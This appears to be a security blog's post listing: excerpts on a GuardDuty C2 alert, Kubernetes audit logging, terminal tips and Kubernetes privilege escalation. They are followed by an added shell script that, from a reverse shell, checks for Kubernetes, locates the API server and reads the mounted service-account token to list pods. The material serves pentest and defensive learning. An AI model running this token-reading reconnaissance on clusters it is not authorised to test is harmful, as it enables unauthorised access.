- Nov 9, 2020 • 4 mins
  On a beautiful autumn day in early November, we received one concerning GuardDuty alert, Backdoor:EC2/C&CActivity.B!DNS, which means that an EC2 instance queried a domain name associated with a known C2 (command and control) server. Here is what we know based on the alert alone: The...
- Sep 30, 2020 • 8 mins
  TLDR: Kubernetes audit logs can provide great visibility into the operation and inner workings of your cluster. They are also a resource with relatively low startup cost for detecting threats and anomalies inside your cluster. In this post, I will talk about shipping Kubernetes audit logs from CloudWatch to...
- Sep 24, 2020 • 2 mins
  Here are some tricks that helped me drastically improve my workflow in the terminal. I will continue to update this post as I go, in case I find new cool tricks that help me ‘ninja’ my way through the terminal. This will probably serve as the backup for...
- Jul 19, 2020 • 3 mins
  Let’s say you got a reverse shell from a process running in a Kubernetes environment. This guide details the basic steps you can take to escalate your privileges within Kubernetes. Are you in a Kubernetes environment? If yes, what’s the API server? `# by default, Kubernetes automounts default service account...`
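The first two questions that last post asks (are you inside Kubernetes, and where is the API server) can be answered from the shell itself. The script below is an added example, not code from the original post: it relies only on the standard in-cluster markers (the `KUBERNETES_SERVICE_HOST`/`KUBERNETES_SERVICE_PORT` environment variables and the automounted service-account directory under `/var/run/secrets/kubernetes.io/serviceaccount`). The `SA_DIR` override and the function names are this example's own, chosen so the checks can be exercised outside a real cluster.

```shell
#!/bin/sh
# Added example (not the original post's code). Defaults below are the
# standard Kubernetes in-cluster paths; SA_DIR can be overridden to point
# the checks at a different directory (useful for testing outside a pod).
SA_DIR="${SA_DIR:-/var/run/secrets/kubernetes.io/serviceaccount}"

# Returns 0 when the usual in-cluster markers are present, 1 otherwise.
# Either marker alone is enough: the env vars come from the kubelet, the
# token file from the (default-on) service-account automount.
in_kubernetes() {
  [ -n "$KUBERNETES_SERVICE_HOST" ] && return 0
  [ -r "$SA_DIR/token" ] && return 0
  return 1
}

# Prints the API server URL an in-cluster client would use. Falls back to
# the cluster DNS name when the env vars were stripped from the process.
api_server() {
  if [ -n "$KUBERNETES_SERVICE_HOST" ]; then
    echo "https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT:-443}"
  else
    echo "https://kubernetes.default.svc"
  fi
}

# Uses the mounted token to ask the API server for the pods in the pod's
# own namespace; a 403 here tells you the identity is unprivileged, a 200
# tells you it can at least enumerate workloads. Requires curl and network
# reachability to the API server, so it is not exercised offline.
list_pods_as_mounted_identity() {
  tok=$(cat "$SA_DIR/token") || return 1
  ns=$(cat "$SA_DIR/namespace" 2>/dev/null || echo default)
  curl -s --cacert "$SA_DIR/ca.crt" \
       -H "Authorization: Bearer $tok" \
       "$(api_server)/api/v1/namespaces/$ns/pods"
}

# Usage from the reverse shell: source or paste the functions, then:
if in_kubernetes; then
  echo "Kubernetes markers found; API server: $(api_server)"
else
  echo "No Kubernetes markers found in this process"
fi
```

If `in_kubernetes` says yes but `list_pods_as_mounted_identity` returns 403, the automounted identity is the default service account with no bindings, and the escalation steps in the post start from there rather than from the token.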